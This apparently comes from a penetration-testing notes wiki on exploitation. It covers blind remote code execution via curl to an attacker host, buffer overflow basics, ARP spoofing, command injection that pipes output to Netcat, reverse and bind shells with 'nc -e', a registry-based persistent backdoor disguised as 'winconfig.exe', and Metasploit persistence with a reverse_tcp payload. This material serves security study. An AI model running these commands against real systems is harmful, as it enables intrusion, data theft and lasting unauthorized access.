π£Exploitation
Remote Code Execution (RCE)
Allows the attacker to execute some code into the web application
There are many ways to do this, the following are targeted at blind code execution:
curl http://<attacker_ip:port>/<cmd_to_try>
if we have spaces in our returned output, we can
base64
encode the result and then decode it on our system.
On our system, we set up a Netcat listener - nc -lvp <port>
If RCE exists we will see the output of the command
Buffer Overflow Attacks
A buffer overflow attack works by taking control of the execution flow of a piece of software. This means being able to force an application to behave differently to how it was designed can lead to:
An app or OS crash, causing DOS
Privilege Escalation
Remote Code Execution (RCE)
Security features bypass
Buffers
A buffer is an area in the computer of RAM reserved for temporary data storage.
User input
Parts of a video file
Server banners
Buffers have a finite size, which means they can only hold a limited amount of data If a client-server app is designed to accept only 8-characters long username, the username buffer will be 8 bytes long.
Buffers are stored in a data structure in computer memory known as a stack To add data to the stack we can use the Last in First Out (LIFO) approach.
Push: add an element to the stack
Pop: removes the last inserted element
In Modern OS's they still use LIFO but an app can randomly access a positon on the stack to read-write data. To save space for later use, the app can reserve memory allocations on the stack to access them.
A raw overflow that overwrites memory will crash an app, while a well-engineered attack is able to execute code.
A deep understanding of Assembly code is recommended!
https://wiki.skullsecurity.org/index.php?title=Fundamentals
Impacket
lookupsid.py anonymous@<IP>
ARP spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
Command Injection π
If you are to execute commands on a server, you are able to pipe the output of a command to Netcat.
Eg.
ls -la | nc {VPN_IP} {PORT}
.This will send the output ofls -la
to your Netcat listener.We can use Netcat with the following flag to execute commands on a server:
nc -lvp <PORT> -e /bin/bash
Backdoors πͺ
Netcat
The victim has the listener so we can get a shell with:
ncat <victim_IP> <port>
The attacker has the listener:
ncat -lvp <port> -v
On the victim's machine, we connect to the attacker IP and we should have access to a shell!
Persistent backdoor
On the attacker machine we run:
ncat -l -p <port> -v
On the victim machine, we need to add Netcat (or Winconfig in this case) to the proper registry so it will start on boot.
On Windows, this in the Registry Editor
add the name
winconfig
and value"PATH TO winconfig.exe <attacker_ip> <port> -e cmd.exe"
Metasploit
If we already have a Meterpreter session on the victim's machine
Find the module:
s4u_persistence
set OPTIONS:
set SESSION {id}
set TRIGGER logon
set PAYLOAD to meterpreter reverse_tcp
set LHOST{local_host} and set LPORT{port}
run -j
then set up a listener using the
handler
exploitthen set the payload, LHOST and LPORT
exploit | run -j
both commands will work
Last updated
Was this helpful?